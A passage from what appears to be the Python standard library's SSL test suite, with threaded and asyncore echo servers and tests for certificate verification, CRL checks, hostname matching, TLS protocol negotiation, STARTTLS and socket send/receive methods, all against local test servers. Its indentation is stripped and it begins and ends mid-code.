# or a low-level bug. This should be made more discriminating.
if not isinstance(e, ssl.SSLError) and e.errno != errno.ECONNRESET:
raise
self.server.conn_errors.append(e)
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.server.stop()
self.close()
return False
else:
if self.server.context.verify_mode == ssl.CERT_REQUIRED:
cert = self.sslconn.getpeercert()
if support.verbose and self.server.chatty:
sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
cert_binary = self.sslconn.getpeercert(True)
if support.verbose and self.server.chatty:
sys.stdout.write(" cert binary is " + str(len(cert_binary)) + " bytes\n")
cipher = self.sslconn.cipher()
if support.verbose and self.server.chatty:
sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
sys.stdout.write(" server: selected protocol is now "
+ str(self.sslconn.selected_npn_protocol()) + "\n")
return True
def read(self):
if self.sslconn:
return self.sslconn.read()
else:
return self.sock.recv(1024)
def write(self, bytes):
if self.sslconn:
return self.sslconn.write(bytes)
else:
return self.sock.send(bytes)
def close(self):
if self.sslconn:
self.sslconn.close()
else:
self.sock.close()
def run(self):
self.running = True
if not self.server.starttls_server:
if not self.wrap_conn():
return
while self.running:
try:
msg = self.read()
stripped = msg.strip()
if not stripped:
# eof, so quit this handler
self.running = False
self.close()
elif stripped == b'over':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: client closed connection\n")
self.close()
return
elif (self.server.starttls_server and
stripped == b'STARTTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
self.write(b"OK\n")
if not self.wrap_conn():
return
elif (self.server.starttls_server and self.sslconn
and stripped == b'ENDTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
self.write(b"OK\n")
self.sock = self.sslconn.unwrap()
self.sslconn = None
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: connection is now unencrypted...\n")
elif stripped == b'CB tls-unique':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read CB tls-unique from client, sending our CB data...\n")
data = self.sslconn.get_channel_binding("tls-unique")
self.write(repr(data).encode("us-ascii") + b"\n")
else:
if (support.verbose and
self.server.connectionchatty):
ctype = (self.sslconn and "encrypted") or "unencrypted"
sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
% (msg, ctype, msg.lower(), ctype))
self.write(msg.lower())
except ssl.SSLError:
if self.server.chatty:
handle_error("Test server failure:\n")
self.close()
self.running = False
# normally, we'd just stop here, but for the test
# harness, we want to stop the server
self.server.stop()
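        # The server itself: builds an SSLContext from the constructor
        # arguments (unless an explicit context is given), binds a free port
        # and hands every accepted connection to a ConnectionHandler thread.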
def __init__(self, certificate=None, ssl_version=None,
certreqs=None, cacerts=None,
chatty=True, connectionchatty=False, starttls_server=False,
npn_protocols=None, alpn_protocols=None,
ciphers=None, context=None):
if context:
self.context = context
else:
self.context = ssl.SSLContext(ssl_version
if ssl_version is not None
else ssl.PROTOCOL_TLSv1)
self.context.verify_mode = (certreqs if certreqs is not None
else ssl.CERT_NONE)
if cacerts:
self.context.load_verify_locations(cacerts)
if certificate:
self.context.load_cert_chain(certificate)
if npn_protocols:
self.context.set_npn_protocols(npn_protocols)
if alpn_protocols:
self.context.set_alpn_protocols(alpn_protocols)
if ciphers:
self.context.set_ciphers(ciphers)
self.chatty = chatty
self.connectionchatty = connectionchatty
self.starttls_server = starttls_server
self.sock = socket.socket()
self.port = support.bind_port(self.sock)
self.flag = None
self.active = False
self.selected_npn_protocols = []
self.selected_alpn_protocols = []
self.conn_errors = []
threading.Thread.__init__(self)
self.daemon = True
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
self.stop()
self.join()
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.sock.settimeout(0.05)
self.sock.listen(5)
self.active = True
if self.flag:
# signal an event
self.flag.set()
while self.active:
try:
newconn, connaddr = self.sock.accept()
if support.verbose and self.chatty:
sys.stdout.write(' server: new connection from '
+ repr(connaddr) + '\n')
handler = self.ConnectionHandler(self, newconn, connaddr)
handler.start()
handler.join()
except socket.timeout:
pass
except KeyboardInterrupt:
self.stop()
self.sock.close()
def stop(self):
self.active = False
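    # asyncore-based echo server used by test_asyncore_server; the handshake
    # is driven step by step from handle_read() because the socket is wrapped
    # with do_handshake_on_connect=False.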
class AsyncoreEchoServer(threading.Thread):
class EchoServer(asyncore.dispatcher):
class ConnectionHandler(asyncore.dispatcher_with_send):
def __init__(self, conn, certfile):
self.socket = ssl.wrap_socket(conn, server_side=True,
certfile=certfile,
do_handshake_on_connect=False)
asyncore.dispatcher_with_send.__init__(self, self.socket)
self._ssl_accepting = True
self._do_ssl_handshake()
def readable(self):
if isinstance(self.socket, ssl.SSLSocket):
while self.socket.pending() > 0:
self.handle_read_event()
return True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except (ssl.SSLWantReadError, ssl.SSLWantWriteError):
return
except ssl.SSLEOFError:
return self.handle_close()
except ssl.SSLError:
raise
except socket.error, err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
data = self.recv(1024)
if support.verbose:
sys.stdout.write(" server: read %s from client\n" % repr(data))
if not data:
self.close()
else:
self.send(data.lower())
def handle_close(self):
self.close()
if support.verbose:
sys.stdout.write(" server: closed connection %s\n" % self.socket)
def handle_error(self):
raise
def __init__(self, certfile):
self.certfile = certfile
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(sock, '')
asyncore.dispatcher.__init__(self, sock)
self.listen(5)
def handle_accept(self):
sock_obj, addr = self.accept()
if support.verbose:
sys.stdout.write(" server: new connection from %s:%s\n" %addr)
self.ConnectionHandler(sock_obj, self.certfile)
def handle_error(self):
raise
def __init__(self, certfile):
self.flag = None
self.active = False
self.server = self.EchoServer(certfile)
self.port = self.server.port
threading.Thread.__init__(self)
self.daemon = True
def __str__(self):
return "<%s %s>" % (self.__class__.__name__, self.server)
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
if support.verbose:
sys.stdout.write(" cleanup: stopping server.\n")
self.stop()
if support.verbose:
sys.stdout.write(" cleanup: joining server thread.\n")
self.join()
if support.verbose:
sys.stdout.write(" cleanup: successfully joined.\n")
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.active = True
if self.flag:
self.flag.set()
while self.active:
try:
asyncore.loop(1)
except:
pass
def stop(self):
self.active = False
self.server.close()
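    # Starts a ThreadedEchoServer with *server_context*, connects a client
    # wrapped with *client_context*, exercises reads and writes, and returns
    # a stats dict (cipher, compression, peercert, ALPN/NPN selections, ...).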
def server_params_test(client_context, server_context, indata=b"FOO\n",
chatty=True, connectionchatty=False, sni_name=None):
"""
Launch a server, connect a client to it and try various reads
and writes.
"""
stats = {}
server = ThreadedEchoServer(context=server_context,
chatty=chatty,
connectionchatty=False)
with server:
with closing(client_context.wrap_socket(socket.socket(),
server_hostname=sni_name)) as s:
s.connect((HOST, server.port))
for arg in [indata, bytearray(indata), memoryview(indata)]:
if connectionchatty:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(arg)
outdata = s.read()
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
raise AssertionError(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
stats.update({
'compression': s.compression(),
'cipher': s.cipher(),
'peercert': s.getpeercert(),
'client_alpn_protocol': s.selected_alpn_protocol(),
'client_npn_protocol': s.selected_npn_protocol(),
'version': s.version(),
})
s.close()
stats['server_alpn_protocols'] = server.selected_alpn_protocols
stats['server_npn_protocols'] = server.selected_npn_protocols
return stats
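    # Helper for the protocol-matrix tests: builds client/server contexts for
    # the two protocol constants and checks that the handshake succeeds
    # (optionally with a specific negotiated version) or fails as expected.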
def try_protocol_combo(server_protocol, client_protocol, expect_success,
certsreqs=None, server_options=0, client_options=0):
"""
Try to SSL-connect using *client_protocol* to *server_protocol*.
If *expect_success* is true, assert that the connection succeeds,
if it's false, assert that the connection fails.
Also, if *expect_success* is a string, assert that it is the protocol
version actually used by the connection.
"""
if certsreqs is None:
certsreqs = ssl.CERT_NONE
certtype = {
ssl.CERT_NONE: "CERT_NONE",
ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
ssl.CERT_REQUIRED: "CERT_REQUIRED",
}[certsreqs]
if support.verbose:
formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
sys.stdout.write(formatstr %
(ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol),
certtype))
client_context = ssl.SSLContext(client_protocol)
client_context.options |= client_options
server_context = ssl.SSLContext(server_protocol)
server_context.options |= server_options
# NOTE: we must enable "ALL" ciphers on the client, otherwise an
# SSLv23 client will send an SSLv3 hello (rather than SSLv2)
# starting from OpenSSL 1.0.0 (see issue #8322).
if client_context.protocol == ssl.PROTOCOL_SSLv23:
client_context.set_ciphers("ALL")
for ctx in (client_context, server_context):
ctx.verify_mode = certsreqs
ctx.load_cert_chain(CERTFILE)
ctx.load_verify_locations(CERTFILE)
try:
stats = server_params_test(client_context, server_context,
chatty=False, connectionchatty=False)
# Protocol mismatch can result in either an SSLError, or a
# "Connection reset by peer" error.
except ssl.SSLError:
if expect_success:
raise
except socket.error as e:
if expect_success or e.errno != errno.ECONNRESET:
raise
else:
if not expect_success:
raise AssertionError(
"Client protocol %s succeeded with server protocol %s!"
% (ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol)))
elif (expect_success is not True
and expect_success != stats['version']):
raise AssertionError("version mismatch: expected %r, got %r"
% (expect_success, stats['version']))
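    # Tests that need a live threaded server: echo, peer certificates, CRLs,
    # hostname checking, protocol combinations, STARTTLS, channel bindings,
    # compression, DH, ALPN/NPN, SNI callbacks and more.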
class ThreadedTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_echo(self):
"""Basic test of an SSL client connecting to a server"""
if support.verbose:
sys.stdout.write("\n")
for protocol in PROTOCOLS:
context = ssl.SSLContext(protocol)
context.load_cert_chain(CERTFILE)
server_params_test(context, context,
chatty=True, connectionchatty=True)
def test_getpeercert(self):
if support.verbose:
sys.stdout.write("\n")
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
s = context.wrap_socket(socket.socket(),
do_handshake_on_connect=False)
s.connect((HOST, server.port))
                # getpeercert() raises ValueError until the handshake is done.
with self.assertRaises(ValueError):
s.getpeercert()
s.do_handshake()
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()
if support.verbose:
sys.stdout.write(pprint.pformat(cert) + '\n')
sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
if 'subject' not in cert:
self.fail("No subject field in certificate: %s." %
pprint.pformat(cert))
if ((('organizationName', 'Python Software Foundation'),)
not in cert['subject']):
self.fail(
"Missing or invalid 'organizationName' field in certificate subject; "
"should be 'Python Software Foundation'.")
self.assertIn('notBefore', cert)
self.assertIn('notAfter', cert)
before = ssl.cert_time_to_seconds(cert['notBefore'])
after = ssl.cert_time_to_seconds(cert['notAfter'])
self.assertLess(before, after)
s.close()
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_crl_check(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(SIGNING_CA)
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(context.verify_flags, ssl.VERIFY_DEFAULT | tf)
# VERIFY_DEFAULT should pass
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with closing(context.wrap_socket(socket.socket())) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# VERIFY_CRL_CHECK_LEAF without a loaded CRL file fails
context.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with closing(context.wrap_socket(socket.socket())) as s:
with self.assertRaisesRegexp(ssl.SSLError,
"certificate verify failed"):
s.connect((HOST, server.port))
# now load a CRL file. The CRL file is signed by the CA.
context.load_verify_locations(CRLFILE)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with closing(context.wrap_socket(socket.socket())) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
def test_check_hostname(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = True
context.load_verify_locations(SIGNING_CA)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with closing(context.wrap_socket(socket.socket(),
server_hostname="localhost")) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with closing(context.wrap_socket(socket.socket(),
server_hostname="invalid")) as s:
with self.assertRaisesRegexp(ssl.CertificateError,
"hostname 'invalid' doesn't match u?'localhost'"):
s.connect((HOST, server.port))
# missing server_hostname arg should cause an exception, too
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with closing(socket.socket()) as s:
with self.assertRaisesRegexp(ValueError,
"check_hostname requires server_hostname"):
context.wrap_socket(s)
def test_wrong_cert(self):
"""Connecting when the server rejects the client's certificate
Launch a server with CERT_REQUIRED, and check that trying to
connect to it with a wrong client certificate fails.
"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
"wrongcert.pem")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_REQUIRED,
cacerts=CERTFILE, chatty=False,
connectionchatty=False)
with server, \
closing(socket.socket()) as sock, \
closing(ssl.wrap_socket(sock,
certfile=certfile,
ssl_version=ssl.PROTOCOL_TLSv1)) as s:
try:
# Expect either an SSL error about the server rejecting
# the connection, or a low-level connection reset (which
# sometimes happens on Windows)
s.connect((HOST, server.port))
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except socket.error as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
def test_rude_shutdown(self):
"""A brutal shutdown of an SSL server should raise an OSError
in the client when attempting handshake.
"""
listener_ready = threading.Event()
listener_gone = threading.Event()
s = socket.socket()
port = support.bind_port(s, HOST)
# `listener` runs in a thread. It sits in an accept() until
# the main thread connects. Then it rudely closes the socket,
# and sets Event `listener_gone` to let the main thread know
# the socket is gone.
def listener():
s.listen(5)
listener_ready.set()
newsock, addr = s.accept()
newsock.close()
s.close()
listener_gone.set()
def connector():
listener_ready.wait()
with closing(socket.socket()) as c:
c.connect((HOST, port))
listener_gone.wait()
try:
ssl_sock = ssl.wrap_socket(c)
except socket.error:
pass
else:
self.fail('connecting to closed SSL socket should have failed')
t = threading.Thread(target=listener)
t.start()
try:
connector()
finally:
t.join()
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv2'),
"OpenSSL is compiled without SSLv2 support")
def test_protocol_sslv2(self):
"""Connecting to an SSLv2 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
# SSLv23 client with specific SSL options
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv2)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
def test_protocol_sslv23(self):
"""Connecting to an SSLv23 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try:
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv2, True)
except socket.error as x:
# this fails on some older versions of OpenSSL (0.9.7l, for instance)
if support.verbose:
sys.stdout.write(
" SSL2 client to SSL23 server test unexpectedly failed:\n %s\n"
% str(x))
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1')
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
# Server with specific SSL options
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False,
server_options=ssl.OP_NO_SSLv3)
# Will choose TLSv1
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True,
server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, False,
server_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv3'),
"OpenSSL is compiled without SSLv3 support")
def test_protocol_sslv3(self):
"""Connecting to an SSLv3 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3')
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23,
False, client_options=ssl.OP_NO_SSLv2)
@skip_if_broken_ubuntu_ssl
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1')
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_1"),
"TLS version 1.1 not supported.")
def test_protocol_tlsv1_1(self):
"""Connecting to a TLSv1.1 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1_1)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_1, False)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_2"),
"TLS version 1.2 not supported.")
def test_protocol_tlsv1_2(self):
"""Connecting to a TLSv1.2 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2',
server_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,
client_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1_2)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2')
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
def test_starttls(self):
"""Switching from clear text to encrypted and back again."""
msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6")
server = ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLSv1,
starttls_server=True,
chatty=True,
connectionchatty=True)
wrapped = False
with server:
s = socket.socket()
s.setblocking(1)
s.connect((HOST, server.port))
if support.verbose:
sys.stdout.write("\n")
for indata in msgs:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
if wrapped:
conn.write(indata)
outdata = conn.read()
else:
s.send(indata)
outdata = s.recv(1024)
msg = outdata.strip().lower()
if indata == b"STARTTLS" and msg.startswith(b"ok"):
# STARTTLS ok, switch to secure mode
if support.verbose:
sys.stdout.write(
" client: read %r from server, starting TLS...\n"
% msg)
conn = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
wrapped = True
elif indata == b"ENDTLS" and msg.startswith(b"ok"):
# ENDTLS ok, switch back to clear text
if support.verbose:
sys.stdout.write(
" client: read %r from server, ending TLS...\n"
% msg)
s = conn.unwrap()
wrapped = False
else:
if support.verbose:
sys.stdout.write(
" client: read %r from server\n" % msg)
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
if wrapped:
conn.write(b"over\n")
else:
s.send(b"over\n")
if wrapped:
conn.close()
else:
s.close()
def test_socketserver(self):
"""Using a SocketServer to create and manage SSL connections."""
server = make_https_server(self, certfile=CERTFILE)
# try to connect
if support.verbose:
sys.stdout.write('\n')
with open(CERTFILE, 'rb') as f:
d1 = f.read()
d2 = ''
# now fetch the same data from the HTTPS server
url = 'https://localhost:%d/%s' % (
server.port, os.path.split(CERTFILE)[1])
context = ssl.create_default_context(cafile=CERTFILE)
f = urllib2.urlopen(url, context=context)
try:
dlen = f.info().getheader("content-length")
if dlen and (int(dlen) > 0):
d2 = f.read(int(dlen))
if support.verbose:
sys.stdout.write(
" client: read %d bytes from remote server '%s'\n"
% (len(d2), server))
finally:
f.close()
self.assertEqual(d1, d2)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
indata = "TEST MESSAGE of mixed case\n"
if support.verbose:
sys.stdout.write("\n")
indata = b"FOO\n"
server = AsyncoreEchoServer(CERTFILE)
with server:
s = ssl.wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(indata)
outdata = s.read()
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
self.fail(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
if support.verbose:
sys.stdout.write(" client: connection closed.\n")
def test_recv_send(self):
"""Test recv(), send() and friends."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
# helper methods for standardising recv* method signatures
def _recv_into():
b = bytearray(b"\0"*100)
count = s.recv_into(b)
return b[:count]
def _recvfrom_into():
b = bytearray(b"\0"*100)
count, addr = s.recvfrom_into(b)
return b[:count]
# (name, method, whether to expect success, *args)
send_methods = [
('send', s.send, True, []),
('sendto', s.sendto, False, ["some.address"]),
('sendall', s.sendall, True, []),
]
recv_methods = [
('recv', s.recv, True, []),
('recvfrom', s.recvfrom, False, ["some.address"]),
('recv_into', _recv_into, True, []),
('recvfrom_into', _recvfrom_into, False, []),
]
data_prefix = u"PREFIX_"
for meth_name, send_meth, expect_success, args in send_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
send_meth(indata, *args)
outdata = s.read()
if outdata != indata.lower():
self.fail(
"While sending with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to send with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
for meth_name, recv_meth, expect_success, args in recv_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
s.send(indata)
outdata = recv_meth(*args)
if outdata != indata.lower():
self.fail(
"While receiving with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to receive with method <<{name:s}>>; "
